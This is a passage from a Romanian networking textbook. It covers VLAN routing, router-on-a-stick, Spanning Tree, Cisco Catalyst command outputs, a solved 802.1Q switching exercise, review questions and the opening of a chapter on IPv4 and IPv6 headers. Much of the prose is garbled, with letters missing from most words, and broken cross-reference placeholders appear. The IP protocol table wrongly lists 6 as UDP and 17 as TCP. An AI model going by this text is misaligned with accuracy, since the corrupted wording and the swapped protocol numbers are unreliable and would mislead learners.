astfel î ât da ă do i a două staţii di VLAN-u i dife ite să o u i e î t e ele este nevoie de
u dispoziti de i el t ei şi a u e u oute . Deoa e e pe t u fie a e VLAN se utilizează de
o i ei o ad esă de eţea, o u i aţia î t e VLAN-u i a fi i posi ilă fă ă utiliza ea u ui outer.
Pentru aceasta se poate folosi un route u o i te faţă pe t u fie a e VLAN, etodă î să
foarte costisitoare pentru u u ă a e de VLAN-u i şi a folosită, sau u outer cu o
i te faţă a e supo tă . Q, i te faţă e a fi o e tată la u po t de trunking.
Pentru u u ă i de VLAN-u i două sau a i t ei se poate folosi un route u două
sau t ei i te feţe Ethernet (Fast Ethernet , aşa u se a ată î figu a de ai jos. Fie a e
legătu ă a switchului cu routerul ep ezi tă o legătu ă de a es, uta ea î t e VLAN-uri fiind o
uta e lasi ă, fie a e VLAN fii d ăzut a o eţea sepa ată.
2-21: Router conectând patru VLAN-uri, folosind interfețe dedi ate
Î să, da ă u ă ul VLAN-u ilo eşte, a eastă etodă este u ade ă at ostisitoa e di

punct de vedere al costului routerului. Î s hi , pute o figu a o i te faţă Ethernet sau
Fast Ethernet a routerului pe t u supo t . Q. Î lo să se foloseas ă i te feţe pe t u
fiecare VLAN, se poate utiliza doa o si gu ă i te faţă a oute ului e a ea o legătu ă de
trunchi între route şi s it h, outerul numindu-se î a est az router-on-a-stick , aşa u se
a ată î figu a de ai jos. I te faţa de t u hi a fi î pă ţită î su i te feţe, fie ă ei
su i te feţe at i ui du-i-se o ad esă IP şi o etodă de t u hie e.
2-22: Router e asigură o u i ația î tre VLAN-uri, folosi d doar o si gură i terfață fizi ă
(router on a stick).
Notă: Majoritatea routerelo u supo tă t u ki g pe i te feţele Ethernet, deşi a tual e te

e istă IO“ I te et o k Ope ati g “ ste pe t u odelele e ofe ă a est lu u.
2.5 Rezumat
După u s-a prezentat, Ethernet se bazează pe u ediu de tip pa tajat shared-media),
de i u ai o si gu ă staţie poate t a s ite la u o e t dat. Astfel, da ă u ă ul odu ilo
pe u seg e t eşte, p o a ilitatea de apa iţie a oliziu ilo se a ă i. Do e iul de
oliziu e este a ea zo ă di tr-o eţea a e a fi afe tată de apa iţia u ei oliziu i î i te io ul
ei. ‘eţeaua lo ală poate fi î pă ţită î do e ii de oliziu e sepa ate p i i te ediul u o
dispozitive din categoria switchurilor.
84 | ‘ e ţ e l e L o a l e
“ it hu ile o st uies di a i şi e ţi o ta elă de aso ie i î t e ad esele MAC şi u a

di i te feţele sale, u ită ta elă de o uta e. A eastă ta elă este o st uită pe aza ad esei
su să a ad ului p i it pe u ul di t e po tu ile s it hului, î ta ela de o uta e fii d
i t odusă aso ie ea <MAC_su să – port_intrare>.
I pa tul edu da ţei asup a eţelelo fo ate u ai di s it hu i este ese ţial. Pe t u
ide tifi a ea u lelo de i el legătu ă de date şi î t e upe ea lo s-a dezvoltat protocolul
numit STP - Spanning Tree Protocol, e po eşte de la o struirea unui arbore de acoperire pe
g aful dete i at de dispoziti ele de i te o e ta e şi de o e iu ile di t e a estea.
O dez olta e î do e iul i te o e tă ii LAN-urilor este posibilitatea de separare a
topologiei logi e de topologia fizi ă, lu u ealizat prin VLAN-uri (Virtul LAN). VLAN-urile împart
o eţea azată pe s it hu i î do e ii de broadcast sepa ate, u lu u foa te i po ta t şi
e esa di auză ă s it hu ile de i el doi î pa t eţeaua î do e ii de olizu e
independente, neavând niciun efect asupra domeniilor de broadcast. Un nou format pentru
cadrele Ethernet . Q a fost i t odus pe t u a ofe i o odalitate ai si plă de
introducere a VLAN-u ilo î o ga izaţii.
2.6 Studiu de caz:

2.6.1 Comenzi pe switchuri Cisco
În acest studiu de caz se vor prezenta câteva output-uri de comenzi de pe switchurile
Catalyst model 2950 .
După u se ştie, s it hu ile î aţă di a i ad esele staţiilo o e tate la po tu ile lo . Î
figura de mai jos switchul A are trei astfel de adrese în tabela de comutare, staţiile fii d
o e tate pe po tu ile , şi . “e o se ă pat u i t ă i stati e î ta ela de o uta e.
P i a ad esă MAC este ea a s it hului, ad esă e fa e pa te di spaţiul de adrese fizice
gestionat de Cisco1, iar celelalte trei sunt adrese MAC virtuale folosite de CatOS (Catalyst
Operating System) pentru adresarea multicast.
SwitchA#show mac-address-table
Mac Address Table
-------------------------------------------
Vlan Mac Address Type Ports
---- ----------- -------- -----
All 0008.219f.5e40 STATIC CPU
All 0100.0ccc.cccc STATIC CPU
All 0100.0ccc.cccd STATIC CPU
All 0100.0cdd.dddd STATIC CPU
1 0004.4dbb.f220 DYNAMIC Fa0/14
1 0004.9a9d.56a0 DYNAMIC Fa0/16
1 0008.a326.13c4 DYNAMIC Fa0/17
Total Mac Addresses for this criterion: 7
Pe t u afişa ea doa a i t ă ilo di a i e se foloseşte comanda:

SwitchA#show mac-address-table dynamic
Mac Address Table
-------------------------------------------
Vlan Mac Address Type Ports
---- ----------- -------- -----
1 0004.4dbb.f220 DYNAMIC Fa0/14
1 0004.9a9d.56a0 DYNAMIC Fa0/16
1 0008.a326.13c4 DYNAMIC Fa0/17
Total Mac Addresses for this criterion: 3
Fie a e ad esă î ăţată de s it h este ţi ută î ta ela de o uta e o a u ită pe ioadă de

ti p u ită ti p de î ăt â i e aging time , aloa e i pli ită fii d de de se u de.
SwitchB#show spanning-tree
VLAN0001
Spanning tree enabled protocol ieee
Root ID Priority 32768
1
http://standards.ieee.org/regauth/oui/oui.txt
Address 0008.a327.8900
Cost 19
Port 6 (FastEthernet0/6)
Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec
Bridge ID Priority 32769 (priority 32768 sys-id-ext 1)
Address 0008.219f.5e40
Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec
Aging Time 300
Interface Role Sts Cost Prio.Nbr Type

---------------- ---- --- --------- -------- --------------------------------
Fa0/4 Desg FWD 19 128.4 P2p
Fa0/6 Root FWD 19 128.6 P2p
Fa0/9 Desg FWD 19 128.9 P2p
Fa0/12 Desg FWD 19 128.12 P2p
Mai sus este p eze tată ieşi ea o e zii show spanning-tree. A eastă o a dă este utilă
când se do eşte afla ea ădă i ii di p op ia eţea, p io itatea şi ad esa MAC a a estuia.
Totodată se o se ă ostul po tului p i a e se o e tează root bridge-ul la switch. Acesta are
aloa ea de , eea e i di ă faptul ă s it hul este o e tat di e t la root bridge pe portul 6.
Valo ile ti pilo de t i ite a ad elo BPDU default se . şi de t e e e di sta ea de blocking
în listening (Max Age şi apoi î learning şi forwarding (Forward Delay) sunt la valorile
implicite. “e o se ă ai i olul po t ădă i ă – Fa / şi statusul fie ă ui po t de pe s it h,
toate cele patru fiind în starea de forwarding.
SwitchA#show mac-address-table aging-time
Vlan Aging Time
---- ----------
300
Da ă se do eşte u ai o s u tă p eze ta ea a opţiu ilo “TP se poate folosi o a da

show spanning-tree summary, eea e i di ă u ă ul po tu ilo e se află î dife itele stă i
“TP şi VLAN-ul di a e a estea fa pa te. Î ieşi ea de ai jos patru porturi sunt în starea de
forwarding, în VLAN-ul 1.
SwitchB#show spanning-tree summary
Switch is in pvst mode
Root bridge for: none
EtherChannel misconfig guard is enabled
Extended system ID is enabled
Portfast Default is disabled
PortFast BPDU Guard Default is disabled
Portfast BPDU Filter Default is disabled
Loopguard Default is disabled
UplinkFast is disabled
BackboneFast is disabled
Pathcost method used is short
Name Blocking Listening Learning Forwarding STP Active

---------------------- -------- --------- -------- ---------- ----------
VLAN0001 0 0 0 4 4
---------------------- -------- --------- -------- ---------- ----------
1 vlan 0 0 0 4 4
Da ă se do eşte izualiza ea e al ulă ii topologiei de ăt e “TP şi t e e ea po tu ilo p i

dife itele stă i la s hi a ea u ei staţii de pe u po t al s it hului pe altul, se poate folosi
comanda:
SwitchB#debug spanning-tree events
Spanning Tree event debugging is on
SwitchB #
01:06:53: STP: VLAN0001 we are the spanning tree root
SwitchB #
01:06:54: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/6, chann
SwitchB #
01:06:57: set portid: VLAN0001 Fa0/6: new port id 8006
01:06:57: STP: VLAN0001 Fa0/6 -> listening
SwitchB #
01:06:58: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/6, chanp
SwitchB #
01:07:02: STP: VLAN0001 heard root 32768-0008.a327.8900 on Fa0/6
01:07:02: supersedes 32769-0008.219f.5e40
01:07:02: STP: VLAN0001 new root is 32768, 0008.a327.8900 on port Fa0/6, cost 19
01:07:02: STP: VLAN0001 sent Topology Change Notice on Fa0/6
SwitchB #
86 | ‘ e ţ e l e L o a l e
01:07:12: STP: VLAN0001 Fa0/6 -> learning

SwitchB #
01:07:27: STP: VLAN0001 sent Topology Change Notice on Fa0/6
01:07:27: STP: VLAN0001 Fa0/6 -> forwarding
La pornirea switchului toate po tu ile se află î VLAN-ul pâ ă la o ouă at i ui e. VLAN-

u ile şi su t eze ate pe t u eţelele FDDI Fiber-Distributed Data Interface), în
timp ce VLAN-u ile şi pe t u eţelele Token Ring.
SwitchC#show vlan brief
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa1/0/1, Fa1/0/2, Fa1/0/3
Fa1/0/4, Fa1/0/5, Fa1/0/6
Fa1/0/7, Fa1/0/8, Fa1/0/9
Fa1/0/10, Fa1/0/11, Fa1/0/12
Fa1/0/13, Fa1/0/14, Fa1/0/15
Fa1/0/16, Fa1/0/17, Fa1/0/18
Fa1/0/19, Fa1/0/20, Fa1/0/21
Fa1/0/22, Fa1/0/23, Fa1/0/24
Gi1/0/1, Gi1/0/2, Gi1/1/1
1002 fddi-default act/unsup
1003 trcrf-default act/unsup
1004 fddinet-default act/unsup
1005 trbrf-default act/unsup
După ea ea VLAN-u ilo şi a legătu ilo de a es se o se ă adăuga ea a esto a î

ta elă:
SwitchC(config)#interface FastEthernet 1/0/14
SwitchC(config-if)#switchport mode access
SwitchC (config-if)#switchport access vlan 2
SwitchC #show vlan brief
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa1/0/1, Fa1/0/2, Fa1/0/3
Fa1/0/4, Fa1/0/5, Fa1/0/6
Fa1/0/7, Fa1/0/8, Fa1/0/9
Fa1/0/10, Fa1/0/11, Fa1/0/12
Fa1/0/13, Fa1/0/15, Fa1/0/17
Fa1/0/18, Fa1/0/19, Fa1/0/20
Fa1/0/21, Fa1/0/22, Fa1/0/23
Fa1/0/24, Gi1/0/1, Gi1/0/2
Gi1/1/1, Gi1/1/2
2 VLAN0002 active Fa1/0/14
3 VLAN0003 active Fa1/0/16
Notă: Da ă se at i uie u po t u ui VLAN e u e istă, po tul este i a ti pâ ă e se

eează VLAN-ul respectiv.
Nu ai po tu ile o figu ate a po tu i de a es su t afişate.
SwitchC (config)#int fastEthernet 1/0/6
SwitchC (config-if)#switchport mode trunk
SwitchC (config-if)#switchport trunk encapsulation dot1q
SwitchC #show interface fastEthernet 1/0/6 switchport
Name: Fa1/0/6
Switchport: Enabled
Administrative Mode: dynamic auto
Operational Mode: down
Administrative Trunking Encapsulation: dot1q
Negotiation of Trunking: On
Access Mode VLAN: 1 (default)
Trunking Native Mode VLAN: 1 (default)
<...>
După ea ea legătu ilo de t u hi, i te feţele pe a e s-au configurat metodele de

t u hie e o fi a ate. A eastă o a dă afişează: u ele po tului, odul ad i ist ati şi
ope aţio al al po tului, etoda de î apsula e, odul de ego ie e, toate opţiunile fiind în
sta ea i pli ită, u e epţia etodei de t u hie e. Modul i pli it pe t u po tu ile u ui
switch este dynamic auto. Da ă i te faţa e i ă u a e se o e tează u po t de pe s it h
supo tă t u hie e şi este o figu ată î odul de t u hie e, legătu a di t e ele două
po tu i de i e u a de t u hi. I pli it, legătu ile de t u hi ego iază etodele de
î apsula e, etodă gestio ată de DTP – Dynamic Trunking Protocol. Da ă i te faţa e i ă

supo tă I“L şi . Q şi a ele i te feţe su t o figu ate să ego ieze etoda de î apsula e,
pe legătu a de t u hi se a folosi I“L.
2.6.2 Încapsularea pachetelor: dot1q
Pentru topologia din imagine se definesc VLAN-uri astfel:

Toate staţiile o e tate pe po t i pa o fi î VLAN 100, cele pe port par în VLAN 200
Legătu a Sw1-Sw4 va fi trunchi cu VLAN nativ 100, estul legătu ilo o fi o figu ate a
şi legătu i de t u hi u VLAN nativ 200
1. “ ieţi toate a tetele ad elo e o apa e î azul î a e staţia C îi trimite un singur cadru
staţiei F.
2. Câte dome ii de oliziu e şi âte do e ii de broadcast su t î toată topologia?
3. Toată eţeaua a fost ei iţializată. “u t t i ise pa hete î eţea: “taţia A trimite un pachet
ăt e staţia C, apoi u pa het ăt e D. F t i ite u pa het ăt e A. Ce i t ă i o fi în tabela de
comutare a switchului Sw2?
Rezolvare:
1. “u esiu ea de pa hete este u ătoa ea:
De la staţia C la switchul Sw2:
MAC destinaţie MAC sursă Lungime/Tip Date CRC
MAC F MAC C 0x0800 X X
De la switchul Sw2 la switchul Sw1:

MAC F MAC C 0x8100 100 0x0800 X X
De la switchul Sw1 la switchul Sw4:

De la switchul Sw4 la staţia F:

88 | ‘ e ţ e l e L o a l e
2a. Do e iile de oliziu e su t ă gi ite de s it hu i şi outere. Fiecare port al

s it hului se află î alt do e iu de oliziu e. Pe t u legătu ile full-duplex nu vor mai exista
coliziuni, astfel porturile switchului negociate în full-duplex u o fi u ă ate a do e ii
distincte de coliziu e. Î azul p o le ei de faţă nu sunt precizate porturile ce ajung în starea
half-duplex, astfel se vor o side a ele două azu i e t e e: toate i te feţele di eţea su t
half-duplex şi azul al doilea î a e toate i te feţele su t full-duplex.
Da ă toate po tu ile su t half-duplex î eţea o e ista do e ii de oliziu e:
{Sw4(7), E}; {Sw3(7), D}; {Sw3(8), E}; {Sw1(7), A}; {Sw1(8), B}; {Sw2(7),
C}; {Sw1(1), Sw2(1)}; {Sw1(2), Sw3(1)}; {Sw1(4), Sw4(4)}; {R1(e0), Sw2(24)};
{R1(e1), X}; {R2(e1), Z}.
‘eţeaua di t e routerele R1 şi R2 este o eţea pu t-la-punct în care nu pot exista
coliziuni.
Pe t u el de al doilea az î a e toate legătu ile su t full-duplex nu va exista niciun
do e iu de oliziu e î eţea.
2b. Domeniile de difuzare sunt conectate doar de routere. Prin definirea de VLAN-u i şi
s it hu ile li itează do e ii de broadcast. În cazul topologiei singura modalitate de a asigura
conectivitatea între VLAN 100 şi VLAN 200 este configurarea routerului R1 ca router-on-a-
stick. Pe t u a easta legătu a di t e Sw2 şi R1 t e uie să t a spo te a ele VLAN-uri.
Problematica domeniilor de broadcast se apli ă doa eţelelo ultia es, astfel pe t u
eţeaua di t e R1 şi R2 legătu a se ială u va exista un domeniu de difuzare.
Cele 4 domenii de broadcast sunt:
{R1(e0), A, C, D, F, Sw1(1), Sw1(2), Sw1(4), Sw1(7), Sw2(1), Sw2(7),
Sw2(24), Sw3(1), Sw3(7), Sw4(4), Sw4(7)}
{R1(e0), B, E, Sw1(1), Sw1(2), Sw1(4), Sw1(8), Sw2(1), Sw2(24), Sw3(1),
Sw3(8), Sw4(4)}
{R1(e1), X}
{R2(e0, Z}
3. Deoa e e eţeaua a fost ei iţializată, ta elele de o utare ale switchurilor nu au nicio
i t a e. Câ d staţia A a t i ite u pa het ăt e staţia C, switchul Sw1, având tabela de
o uta e goală, a t i ite pa hetul pe toate po tu ile ai puţi el pe a e a sosit. După u
se ştie s it hu ile îşi populează ta elele de o uta e pe aza ad eselo MAC su să a ad elo
primite. Astfel, switchul Sw1, î ai te de t i ite ea pa hetului p i it de la staţia A, va scrie în
tabela de comutare asocierea <MAC A – port 7>. La fel, switchul Sw4 va scrie în tabela de
comutare asocierea <MAC A – port 4>. Când pachetul va ajunge la switchul Sw2, acesta va
p o eda si ila , t i iţâ du-l pe toate po tu ile ai puţi el pe a e a e it, populâ d
totodată ta ela de o uta e u aso ie ea <MAC A – port 1>.
Câ d staţia A a t i ite u pa het ăt e staţia D, procesul de în ăţa e şi de t i ite e este
similar. În acest caz, switchul Sw2 nu va mai scrie în tabela de comutare asocierea MAC sursă
– port (<MAC A – port 1> , a eastă i t a e e istâ d deja.
Câ d staţia F a t i ite u pa het ăt e staţia A, switchul Sw4 îl va primi, verificând adresa
desti aţie, pe aza ă eia a lua o de izie. Cu ad esa MAC desti aţie este ea a lui A (MAC A şi
u î ta ela de o uta e e istă o i t a e de tipul < MAC A – port 4>, switchul Sw4 va
trimite pachetul pe portul 4, acesta ajungând la switchul Sw1. Switchul Sw1 va verifica tabela
de o uta e şi a des ope i i t a ea <MAC A – port 7>, eea e îl dete i ă să t i ită
pachetul pe portul 7, u de e istă staţia A.
Astfel, tabela de comutare a switchului Sw2 va avea în urma trimiterii celor 3 pachete o
si gu ă i t a e şi a u e <MAC A – port 1>.
Ad esă MAC Port
MAC A 1
2-23: Tabela de comutare a switchului Sw2

2.7 Realizarea unui bridge între conexiuni în Windows Server 2008

Î u ele azu i şi topologii este de do it să se o i e ai ulte o e iu i de eţea de pe
a elaşi al ulato astfel î ât Wi do s să le t ateze a pe si gu ă eţea ia e ii eţelelo
să poată o u i a î t e ei pe fe t t a spa e t. De ase e ea, a eastă teh i ă p esupu e şi
include ea tutu o eţelelo aflate î bridging într-un singur domeniu de broadcast.
Un alt avantaj al bridging-ului este faptul ă pot fi o i ate eţele de teh ologii dife ite
(wireless, Ethernet, hia şi Token Ring), atâta timp cât echipamentul care realizează bridging-
ul deţi e i te feţele o espu zătoa e î fie a e eţea.
2-24: Realizarea unui bridge î tre ai ulte o e iu i de rețea
Tehnica de realizare a unui brigde î t e ai ulte o e iu i de eţea, pe Windows Server

2008 se edu e la sele ta ea a două sau a ai ulto o e iu i de eţea di Network
Connections şi la alege ea opţiu ii de Bridge Connections di e iul o te tual o ţi ut p i
clic dreapta.
Pe un calculator poate fi definit un singur bridge, da a esta poate o ţi e o i âte eţele.
Bridge-ul poate fi eliminat în orice moment din interfata Network Connections printr-un clic
d eapta pe el si alege ea opţiu ii de ște ge e. Î od ase ă ăto , o o e iu e poate fi
eli i ată di t -un bridge.
Ate ţie! Realiza ea u ui idge î t e o o e iu e sp e o eţea lo ală şi u a sp e I te et
este posi ilă da t e uie ţi ut o t de faptul ă toate staţiile di eţeaua lo ală o t e ui să
poată a ea a es la I te et şi să p i eas ă ad ese di a elaşi su et a şi ad esa e te ă a
gateway-ului, ceea ce nu e întotdeauna posibil din partea ISP-ului. De asemenea, trebuie avut
î ede e şi faptul ă e pu e ea staţiilo di eţeaua lo ală î I te et poate ep eze ta u is
de securitate.
90 | ‘ e ţ e l e L o a l e
Î tre ări
1. Care este rezultatul segmentării unei reţele cu un switch ?
 C eşte u ă ul do e iilo de oliziu e
 “ ade u ă ul do e iilo de oliziu e
 C eşte u ă ul do e iilo de oad ast
 “ ade u ă ul do e iilo de oad ast
2. Care este numărul minim de adrese MAC asociate cu un switch de nivel doi?
 Una
 Două
 Atâtea âte po tu i e istă
 Niciuna
3. Câte domenii de broadcast sunt în figura de mai jos ?
 1
 2
 3
 4
4. Ce nivel din stiva OSI este folosit de către switchurile Ethernet pentru a lua o decizie ?
 Nivelul 1
 Nivelul 2
 Nivelul 3
 Nivelul 4
5. Pe baza cărei informaţii un switch Ethernet poate lua o decizie ?

 adresa IP
 ad esa MAC desti aţie
 adresa CAM
 ad esa MAC su să
6. Ce metodă de comutare citeşte primii 64 de octeţi ai cadrului, înainte de trimitearea

acestuia?
 fast-forward
 cut-through
 fragment-free
 store and forward
7. Care dintre următoarele afirmaţii este adevărată despre VLAN-uri?

 T e uie să existe el puţi două VLAN-uri definite într-o eţea
 Toate VLAN-u ile su t o figu ate pe po tu ile ele ai apide, şi i pli it, i fo aţia se
t a s ite elo lalte s it hu i di eţea
 Reduc dimensiunea domeniului de broadcast
 VLAN-u ile ă es u ă ul de switchuri dintr-o eţea
8. Care dintre următoarele afirmaţii este adevărată cu privinţă la comutarea de nivel doi
(alegeţi două variante)?
 Un switch este un hub cu mai multe porturi
 Un switch este o punte cu mai multe porturi
 “ it hu ile î aţă ad esele IP ale ad elo şi iau de izii pe aza a esto a
 “ it hu ile î aţă ad esele MAC, e a i â d â pul su să al fie ă ui ad u
9. Switchul dumneavoastră trebuie să fie setat ca root bridge. Care dintre următoarele
posibilităţi va face acest switch să devină root bridge?
 “eta ea ad esei MAC a s it hului la o aloa e i i ă
 “eta ea p oto olului “TP la o aloa e i i ă
 “eta ea p io ităţii s it hului la o aloa e a i ă
 “eta ea p io ităţii s it hului la o aloa e i i ă
10. Un switch Ethernet dispune de o tabelă de comutare ca cea din figura de mai jos. Ce
decizie va lua switchul dacă va primi cadrul cu adresa destinaţie 00-00-3D-1F-11-03 şi adresa
sursă 00-00-3D-1F-11-01:
Staţia Port 1 Port 2 Port 3 Port 4
00-00-3D-1F-11-01 X
00-00-3D-1F-11-02
00-00-3D-1F-11-03 X X
 Va trimite cadrul pe toate porturile
 Va t i ite ad ul pe toate po tu ile, u e epţia po tului
 Va ignora cadrul
 Va trimite cadrul pe portul 1
92 | ‘ e ţ e l e L o a l e
3 Adresarea IP
 “pe ifi aţiile p oto olului IP
 Noţiu i de subnetting
 Fu ţio a ea p oto olului A‘P
 Fu ţio a ea p oto olului DHCP
 Co figu ă i de eţea î Li u
 Co figu ă i de eţea î Wi do s
Cine este...
Vint Cerf este o side at pă i tele I te etului". După e a a sol it U i e sitatea
Stanford, a lucrat la IBM, iar apoi s-a întors la Universitate la UCLA, unde a conectat
p i ele două odu i a ARPA et p ede eso ul I te etului . A p oie tat p oto olul IP și a
o t i uit la dez olta ea p oto olului TCP. Di , Vi t Ce f lu ează la Google a
i ep eședi te.
3.1 Prezentarea protocolului IP

I te etul a de e it o oţiu e fa ilia ă pe t u so ietatea din prezent. Cu toate acestea, în
u ă u de a i p ea puţi i izio a i au i tuit dez olta ea pe a e a esta u a să o
u oas ă. Multe di t e o eptele fu da e tale ale i f ast u tu ii IP de azi au fost defi ite î
a ea pe ioadă, p e u fo atul ad esei IP, p oto olul A‘P, VL“M. P oto olul IP t e uia să
ăspu dă s hi ă ii pa adig ei de o u i aţie de la o eţea u âte a lo aţii, p e u
eţeaua DA‘PA, la o eţea u ii de lo aţii u e a p i it I te etul la ijlo ul a ilo ` .
Apa iţia al ulatoa elo pe so ale şi e ti de ea eţelei glo ale de o u i aţie di olo
e t ele u i e sita e au edefi it I te etul a o eţea u sute de ilioa e de odu i.
Ve siu ea a p oto olului IP a euşit să ăspu dă atât e i ţelo de ie a hiza e a spaţiului
de ad ese i pus de eţelele a ilo ` , ât şi e i ţelor de scalabilitate ale Internetului actual.
Pe t u asigu a ea s ala ilităţii au fost sta da dizate p oto oale e ite să ad eseze uta ea
di a i ă, t a slata ea de ad ese, tu ela ea pa hetelo , et .
Ve siu ea a p oto olului IP a fost i iţial p oie tată să asigu e u spaţiu de ad ese ult
ai ge e os, da şi u u ă de se i ii e lipses di IP , p e u Qo“ sau p elu a ea ai
apidă a pa hetelo . Cu toate a estea, p elu a ea supli e ta ă p esupusă de u a tet de
de o teţi faţă de u ul de , p e u şi popula itatea deose ită de a e se u u ă IP fa a
po de ea eţelelo IP î st u tu a a tuală a I te etului să ă â ă de su %. P i u a e,
pe parcursul acestei ă ţi, p i p oto olul IP se a su î ţelge doa efe i ea la IPv4.
3.1.1 Structura antetului IPv4

O i e pa het aju s la i elul eţea este eî pa hetat, adăugâ du-i-se antetul IP. În Error!
Reference source not found. sunt prezentate câmpurile ce compun antetul IP, urmând apoi o
s u tă des ie e a a estora.
93 | A d r e s a r e a I P
0 4 8 16 19
31
vers lung. TOS Lungime totală
identificator flags decalaj
fragment
TTL Protocol suma de control a
antetului
Adresa IP sursă
Adresa IP destinaţie
Opţiuni (dacă e cazul)
Date
...
3-1: Structura antetului IP
Din analiza antetului se ide tifi ă u ai puţi de â pu i î afa a elo e p e izează

ad esele desti aţie şi su să. De-a lungul timpului se ifi aţia a esto â pu i a fost
edefi ită.
Câ pul e siu e sta ileşte e siu ea IP folosită, a tetul de IP dife i d de a tetul IP .
Lu gi ea a tetului este p e izată e pli it î el de al doilea â p î ede ea fle i iliză ii
dez oltă ilo ulte ioa e ale sta da dului IP , p i setă i fă ute î â pul de opţiu i aflat î
fi alul a tetului IP. Totuşi asta ajo itate a t afi ului î I te et foloseşte a tete de lu gi e
fi ă, de de o teţi, pe fo a ţele de efe i ţă ale e hipa e telo de eţea p e u u ă ul
de pa hete o utate pe se u dă fii d al ulate pe t u t afi IP u a tet de lu gi e fi ă.
Câmpul TOS (Type of Service) este folosit pentru implementarea unor politici distincte
pe t u tipu i de t afi dife it. Cea ai i po ta tă utiliza e a sa este pe t u ide tifi a ea şi
prioritizarea traficului de voce.
Câ pul de lu gi e totală este e p i at pe iţi, ezultâ d o di e siu e a i ă a
ad elo IP de de o teţi. După u se poate o se a di apitolul ef ??, u e istă o
dimensiune ma i ă pe t u seg e tele TCP, ea e î sea ă ă seg e tele e depăşes
KB o fi f ag e tate la i elul eţea. Deşi di e siu ea a i ă p e ăzută de sta da d este
de KB, i pu e ea Ethe etului a teh ologie do i a tă pe t u eţelele lo ale a e d ept
conse i ţă faptul ă t afi ul TCP, după e este seg e tat î pa hete de KB la i elul , a
ai fi î ă odată seg e tat î ad e de o teţi la i elul . Pe t u a edu e o ple itatea
p elu ă ilo asup a pa hetelo , i ple e tă ile u e te ale sti ei TCP/IP e ită să ealizeze
două ope aţii de f ag e ta e, i pu â d a di e siu e a i ă a ad elo IP B şi u
KB.
Me a is ul de se e ţie e a ad elo ep ezi tă p i ipalul e a is de o t ol al
flu ului î TCP; u toate a estea, se o se ă ă u e a is de se e ţie e e istă şi la i elul
a tetului IP. Câ pul ide tifi ato sta ileşte u ă ul datag a ei şi este folosit î o ju ţie u
câmpul decalaj fragment pentru a reordona cadrele IP ajunse într-o altă o di e de ât au fost
transmise. Ambele câmpu i su t î ge e al sta ilite de staţia e e ite pa hetul, da da ă pe
alea ăt e desti aţie ai a e lo o f ag e ta e a pa hetului alo ile lo o fi odifi ate.
Biţii de opţiu e su t folosiţi tot pe t u a o t ola f ag e ta ea. “p e e e plu, itul din
a tetul IP este de u it itul M sau itul more fragments . A esta i di ă faptul ă a a ut lo o
f ag e ta e şi ă pa hetul de faţă u este ulti ul di ad ul seg e tului TCP. Bitul este
de u it ) sau itul zero fragments şi a e olul de a se aliza ă pa hetul a tual este ulti ul
(sau singurul) din segmentul TCP.
Un câmp important din antetul IP este TTL (Time To Live , â p e defi eşte u ă ul
maxim de routere p i a e u pa het poate să t ea ă. P i ipala sa fu ţie este de a e ita
94 | ‘ e ţ e l e L o a l e
ciclarea la infinit a unor pachete IP în cazul unor topologii cu bucle de rutare. O utilizare mai
e e tă a a estui â p pe ite u ui I“P să o t oleze o e ta ea u ei staţii, pe t u o
legătu ă dată. De e e plu, u I“P poate î t e upe o e ti itatea atu i â d pe o legătu ă î
lo de o staţie se o e tează eauto izat u router e a e î spate o î t eagă eţea lo ală.
Ma ea ajo itate a t afi ului î I te et ălăto eşte î t e su să şi desti aţie păst â d
a eleaşi alo i pe t u â pu ile a tetului IP, sigu ul â p odifi at fii d â pul TTL. Deşi
ope aţia de de e e ta e a alo ii â pului TTL este u a si plă, ea dete i ă o î ă a e
se ifi ati ă a routerului, deoa e e î u a odifi ă ii a estui â p a t e ui să fie
e al ulată şi su a de o t ol a a tetului. “u a de o t ol se azează pe u algo it de
edu da ţă i li ă u algo it C‘C e a e p op ietatea ă se poate e ifi a uşo , da se
al ulează ult ai g eu e ifi a ea se poate efe tua fă ă a al ula e pli it aloa ea su ei de
control).
Câmpul protocol spe ifi ă e p oto ol a fost folosit pe t u î apsula ea de i el t a spo t.
În figura de mai jos sunt prezentate câteva dintre valorile cele mai întâlnite ale acestui câmp.
Valo ile şi su t folosite î azul tu elă ii ia aloa ea este folosită pe t u a i di a ă u
ai e istă u alt a tet, o astfel de o e iu e fii d u ită IP raw.
Valoare Protocol
1 ICMP
4 IPv4
6 UDP
17 TCP
41 IPv6
59 Fă ă a tet
3-2: Valorile câmpului protocol pentru antetul IP
3.1.2 Structura antetului IPv6

Protocolul IP este sta da dizat p i ‘FC , ele ai i po ta te două dife e ţe faţă
de IP fii d lu gi ea fi ă a a tetului de de o teţi şi eli i a ea su ei de o t ol a
antetului.
Din structura unui pachet IPv6 se o se ă ă i i di t e â pu ile a tetului IPv4 nu se
ai egăses î a tetul de IP : lu gi ea a tetului, ide tifi ato ul de se e ţă, iţi de o t ol,
decalaj fragment, suma de control a antetului.
“e o se ă ă toate e a is ele de f ag e ta e di a tetul IP au fost eli i ate. IP
ealizează f ag e ta ea p e u şi alte fu ţii p i folosi ea u o a tete de e te sie.
P e iza ea tipului de a tet de e te sie folosit se fa e p i â pul „A tet u ăto Next
Header , â p e foloseşte a eleaşi alo i a şi â pul „P oto ol di a tetul IP ezi Error!
Reference source not found.). Valoarea 43 a acestui câmp indicǎ e iste ţa u ui a tet IP de
fragmentare dupǎ antetul curent.
Eli i a ea su ei de o t ol di a tet este oti ată de u ă ul ult ai i al e orilor în
eţelele a tuale î u a t e e ii de la legătu ile de up u la ele opti e sau p i folosi ea
a lu ilo de up u de o alitate ai u ă . ‘ezultatul a estei odifi a i este eşte ea itezei
de p elu a e a a tetului de eţea, deoa e e u ai este necesar calcului sumei de control la
fie a e odifi a e a â pului „li ită hopu i e hi ale tul â pului TTL di Ip .
vers clasă trafic Etichetă de flux

Lungime date Antet urm. Limită hopuri
Adresa IPv6 sursă
[ 3 x 32 ]
Adresa IPv6 destinaţie
[ 3 x 32 ]
Date
...
3-3: Structura antetului IPv6
Singurul câmp din antetul IPv6 ce nu are un echivalent în antetul IPv4 este câmpul
„Eti hetă de flu . A est â p pe ite routerelo să o ute ad ele pe aza u ei alo i de
de iţi şi u pe aza ad esei desti aţie. A eastă etodă de o uta e folosi d doa o eti hetă
